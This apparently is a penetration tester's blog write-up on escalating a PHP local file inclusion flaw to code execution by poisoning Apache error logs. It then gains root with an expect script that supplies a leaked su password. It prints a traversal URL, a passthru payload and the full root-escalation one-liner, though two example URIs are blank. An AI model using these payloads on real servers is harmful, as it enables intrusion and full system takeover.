LFI..Code Exec..Remote Root!

Recently on a pentest i came accross an interesting Local file inclusion vulnerability. On this occassion it was definitely not a RFI and all i could do was include files from local app server.

E.g. vulnsite.com?exec=aaa/../../../../../etc/passwd%00aa

returned the /etc/passwd file. The application server was running as 'apache' user and it didnt have permissions to read /etc/shadow or to do anything "interesting".

Code Execution:

There are quite a few nice articles on internet on how one can do code execution from LFI. Essentially, you try to insert php code into certain files and then try to include these files. These files typically are:

Apache access logs
Apache error logs


On this occassion the 'apache' user had access to read the error logs. So, when you access a URI such as:


It adds the following line to apache's error log:

404 file not found foo<?php passthru('id');?>

Now, you can include the error log files and execute the OS code:


Getting Root:

On this occasion, i was lucky and i spotted a file which had a clear text root password in it. However, getting root wasnt very easy, as i could not figure out an easy way to provide this root password within the php script. In the end after searching for quite a bit, i found a way to do this in expect with the following 1 line of php script:

<?php passthru('echo -e '#!/usr/bin/expect -fnset password [lrange $argv 0 0]; set cmd [lrange $argv 1 1];set timeout -1; spawn su -c "$cmd" ;match_max 100000 ;expect "*?assword:*"; send -- "$passwordr"; send -- "r"; expect eof'>/tmp/su.exp&amp;/usr/bin/expect /tmp/su.exp passw0rd whoami>>/tmp/out.txt');?>

This script will do the following:
1. create an expect script(/tmp/su.exp) which will take the root (su) password and command to execute as argument.
2. run the expect script with the root password and command to run as root.

Enjoy the root privileges!
P.S: it is quite common to see expect installed on *nix application servers